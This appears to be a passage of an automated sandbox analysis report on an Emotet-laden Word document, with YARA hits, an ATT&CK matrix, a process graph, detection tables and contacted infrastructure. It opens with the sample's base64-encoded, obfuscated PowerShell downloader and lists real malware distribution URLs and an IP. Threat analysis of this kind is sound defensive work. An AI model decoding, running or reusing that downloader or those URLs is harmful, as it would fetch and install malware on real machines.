JABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004C5A cpuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2095230919.0000000000261000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2107302523.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2096491142.0000000000241000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2104856163.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2346371672.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101735840.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101060119.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2101000772.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2107439959.0000000000231000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101688824.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2108653259.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2103856048.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2099670858.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2098319985.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2106854955.0000000000470000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2108749500.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2104985518.0000000000261000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2096383511.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2103936335.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.3d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.3b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.20a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection11Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting32Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCommand and Scripting Interpreter211Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaPowerShell4Rc.commonRc.commonMasquerading21Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 336501 Sample: bestand-8881014518 00944.doc Startdate: 06/01/2021 Architecture: WINDOWS Score: 100 53 Multi AV Scanner detection for domain / URL 2->53 55 Antivirus detection for URL or domain 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 12 other signatures 2->59 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 25 2->17         started        process3 signatures4 73 Suspicious powershell command line found 14->73 75 Very long command line found 14->75 77 Encrypted powershell cmdline option found 14->77 79 PowerShell case anomaly found 14->79 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 51 petafilm.com 176.53.69.151, 49165, 80 RADORETR Turkey 19->51 49 C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll, PE32 19->49 dropped 63 Powershell drops PE file 19->63 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 15 26->28         started        signatures11 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->71 31 rundll32.exe 5 28->31         started        process12 signatures13 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->83 34 rundll32.exe 5 31->34         started        process14 signatures15 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->61 37 rundll32.exe 5 34->37         started        process16 signatures17 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->65 40 rundll32.exe 5 37->40         started        process18 signatures19 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->67 43 rundll32.exe 5 40->43         started        process20 signatures21 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->69 46 rundll32.exe 5 43->46         started        process22 signatures23 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 46->81

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      bestand-8881014518 00944.doc32%VirustotalBrowse
                      bestand-8881014518 00944.doc48%ReversingLabsDocument-Word.Trojan.Heuristic

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      16.2.rundll32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.2.rundll32.exe.260000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.2.rundll32.exe.3d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.rundll32.exe.3a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      8.2.rundll32.exe.240000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.rundll32.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.2.rundll32.exe.2a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.rundll32.exe.2a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.2.rundll32.exe.20a0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.260000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      petafilm.com6%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://petafilm.com6%VirustotalBrowse
                      http://petafilm.com0%Avira URL Cloudsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://zieflix.teleskopstore.com/cgi-bin/Gt3S/0%Avira URL Cloudsafe
                      https://somanap.com/wp-admin/P/0%Avira URL Cloudsafe
                      https://fnjbq.com/wp-includes/rlR/100%Avira URL Cloudmalware
                      http://wap.zhonglisc.com/wp-includes/QryCB/100%Avira URL Cloudmalware
                      http://petafilm.com/wp-admin/4m/100%Avira URL Cloudmalware
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/100%Avira URL Cloudmalware
                      http://givingthanksdaily.com/qlE/VeF/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      petafilm.com
                      		176.53.69.151
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://petafilm.com/wp-admin/4m/true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmpfalse
                        		high
                        http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2097194758.0000000001D20000.00000002.00000001.sdmpfalse
                          		high
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmpfalse
                              		high
                              http://petafilm.compowershell.exe, 00000005.00000002.2102033680.0000000003A65000.00000004.00000001.sdmptrue
                              • 6%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmpfalse
                                		high
                                http://zieflix.teleskopstore.com/cgi-bin/Gt3S/powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                https://somanap.com/wp-admin/P/powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://investor.msn.com/rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmpfalse
                                  		high
                                  https://fnjbq.com/wp-includes/rlR/powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://wap.zhonglisc.com/wp-includes/QryCB/powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.%s.comPApowershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		low
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmpfalse
                                    		high
                                    https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://givingthanksdaily.com/qlE/VeF/powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    176.53.69.151
                                    		unknownTurkey
                                    		42926RADORETRtrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:336501
                                    Start date:06.01.2021
                                    Start time:08:52:42
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 25s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:bestand-8881014518 00944.doc
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • GSI enabled (VBA)
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winDOC@34/8@1/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 93% (good quality ratio 89.5%)
                                    • Quality average: 75%
                                    • Quality standard deviation: 25.5%
                                    HCA Information:
                                    • Successful, ratio: 93%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .doc
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Found warning dialog
                                    • Click Ok
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    08:53:40API Interceptor1x Sleep call for process: msg.exe modified
                                    08:53:41API Interceptor23x Sleep call for process: powershell.exe modified
                                    08:53:44API Interceptor291x Sleep call for process: rundll32.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    176.53.69.151pack 2254794.docGet hashmaliciousBrowse
                                    • petafilm.com/wp-admin/4m/
                                    informazioni-0501-012021.docGet hashmaliciousBrowse
                                    • petafilm.com/wp-admin/4m/
                                    rapport 40329241.docGet hashmaliciousBrowse
                                    • petafilm.com/wp-admin/4m/
                                    Dati_012021_688_89301.docGet hashmaliciousBrowse
                                    • petafilm.com/wp-admin/4m/
                                    2199212_20210105_160680.docGet hashmaliciousBrowse
                                    • petafilm.com/wp-admin/4m/
                                    ARCHIVO_FILE.docGet hashmaliciousBrowse
                                    • petafilm.com/wp-admin/4m/
                                    doc_X_13536.docGet hashmaliciousBrowse
                                    • petafilm.com/wp-admin/4m/
                                    ytgeKMQNL2.docGet hashmaliciousBrowse
                                    • petafilm.com/wp-admin/4m/

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    petafilm.compack 2254794.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    informazioni-0501-012021.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    rapport 40329241.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    Dati_012021_688_89301.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    2199212_20210105_160680.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    ARCHIVO_FILE.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    doc_X_13536.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    ytgeKMQNL2.docGet hashmaliciousBrowse
                                    • 176.53.69.151

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    RADORETRpack 2254794.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.docGet hashmaliciousBrowse
                                    • 185.225.36.38
                                    informazioni-0501-012021.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                                    • 185.225.36.38
                                    PSX7103491.docGet hashmaliciousBrowse
                                    • 185.225.36.38
                                    Beauftragung.docGet hashmaliciousBrowse
                                    • 185.225.36.38
                                    rapport 40329241.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    Dati_012021_688_89301.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    2199212_20210105_160680.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                                    • 185.225.36.38
                                    ARCHIVO_FILE.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    doc_X_13536.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    ytgeKMQNL2.docGet hashmaliciousBrowse
                                    • 176.53.69.151
                                    vrhiyc.exeGet hashmaliciousBrowse
                                    • 46.45.148.196
                                    ucrcdh.exeGet hashmaliciousBrowse
                                    • 46.45.148.196
                                    lrbwh.exeGet hashmaliciousBrowse
